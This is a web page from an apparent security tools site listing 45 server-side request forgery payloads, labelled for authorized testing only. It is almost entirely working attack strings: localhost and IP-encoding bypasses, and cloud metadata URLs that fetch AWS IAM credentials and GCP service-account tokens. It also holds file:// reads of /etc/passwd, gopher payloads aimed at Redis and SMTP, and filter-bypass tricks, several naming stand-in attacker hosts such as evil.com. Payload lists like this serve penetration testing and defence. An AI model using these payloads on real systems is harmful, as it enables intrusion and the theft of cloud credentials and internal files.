Help Ukraine, click for information
ssrf-payloads

root@sovietghost:~/tools/ssrf-payloads#

45 SSRF payloads — localhost bypasses, cloud metadata endpoints, protocol schemes. Authorized testing only.

45 payloads

localhostBasic
http://localhost/
127.0.0.1Basic
http://127.0.0.1/
0.0.0.0Basic
http://0.0.0.0/
127.1Basic
http://127.1/

short-form loopback

0Basic
http://0/

resolves to 0.0.0.0

127.0.0.1:80Basic
http://127.0.0.1:80/
Internal RFC1918 /8Basic
http://10.0.0.1/
Internal RFC1918 /12Basic
http://172.16.0.1/
Internal RFC1918 /16Basic
http://192.168.1.1/
IPv6 loopbackIPv6
http://[::1]/
IPv4-mapped IPv6IPv6
http://[::ffff:127.0.0.1]/
IPv4-mapped hexIPv6
http://[::ffff:7f00:0001]/

127.0.0.1 in hex

IPv6 all zerosIPv6
http://[0000::1]/
URL-encoded 127.0.0.1Encoding
http://%31%32%37%2E%30%2E%30%2E%31/
Decimal IPEncoding
http://2130706433/

127.0.0.1 as decimal integer

Octal IPEncoding
http://017700000001/

127.0.0.1 in octal

Hex IPEncoding
http://0x7f000001/

127.0.0.1 in hex

Mixed encodingEncoding
http://0177.0.0.1/

first octet in octal

Double URL encodeEncoding
http://%25%36%31%25%36%63%25%36%66%25%36%33%25%36%31%25%36%63%25%36%38%25%36%66%25%37%33%25%37%34/
CRLF injectionEncoding
http://evil.com%0d%0aHeader:injected
AWS IMDSv1Cloud Metadata
http://169.254.169.254/latest/meta-data/
AWS IAM credentialsCloud Metadata
http://169.254.169.254/latest/meta-data/iam/security-credentials/
AWS user-dataCloud Metadata
http://169.254.169.254/latest/user-data
GCP metadataCloud Metadata
http://metadata.google.internal/computeMetadata/v1/

requires Metadata-Flavor: Google header

GCP service accountCloud Metadata
http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
Azure IMDSCloud Metadata
http://169.254.169.254/metadata/instance?api-version=2021-02-01

requires Metadata: true header

DigitalOcean metadataCloud Metadata
http://169.254.169.254/metadata/v1.json
Alibaba Cloud metadataCloud Metadata
http://100.100.100.200/latest/meta-data/
Kubernetes API serverCloud Metadata
https://kubernetes.default.svc/api/v1/namespaces
Docker daemonCloud Metadata
http://localhost:2375/containers/json
file:// /etc/passwdProtocol Schemes
file:///etc/passwd
file:// win.iniProtocol Schemes
file:///C:/Windows/win.ini
gopher:// SSRFProtocol Schemes
gopher://127.0.0.1:6379/_SET%20ssrf%201

Redis via Gopher

gopher:// SMTPProtocol Schemes
gopher://127.0.0.1:25/_MAIL%20FROM:attacker@evil.com
dict:// port probeProtocol Schemes
dict://127.0.0.1:22/info

SSH banner via dict://

ldap:// lookupProtocol Schemes
ldap://127.0.0.1:389/%0astats%0aquit
sftp:// readProtocol Schemes
sftp://evil.com:2222/
DNS rebindingFilter Bypass
http://spoofed.attacker.com/

domain resolves to 127.0.0.1 post-check

Open redirect chainFilter Bypass
http://trusted.com/redirect?url=http://169.254.169.254/
@ trickFilter Bypass
http://evil.com@127.0.0.1/

some parsers take host before @

# fragment trickFilter Bypass
http://127.0.0.1#evil.com
? param trickFilter Bypass
http://127.0.0.1?@evil.com
Backslash bypassFilter Bypass
http://127.0.0.1\evil.com
Subdomain confusionFilter Bypass
http://127.0.0.1.evil.com/

if allowlist checks suffix only

Enclosed alphanumericsFilter Bypass
http://⑫⑦.⓪.⓪.①/

Unicode look-alike digits

> Thanks for visiting. Stay curious and stay secure. _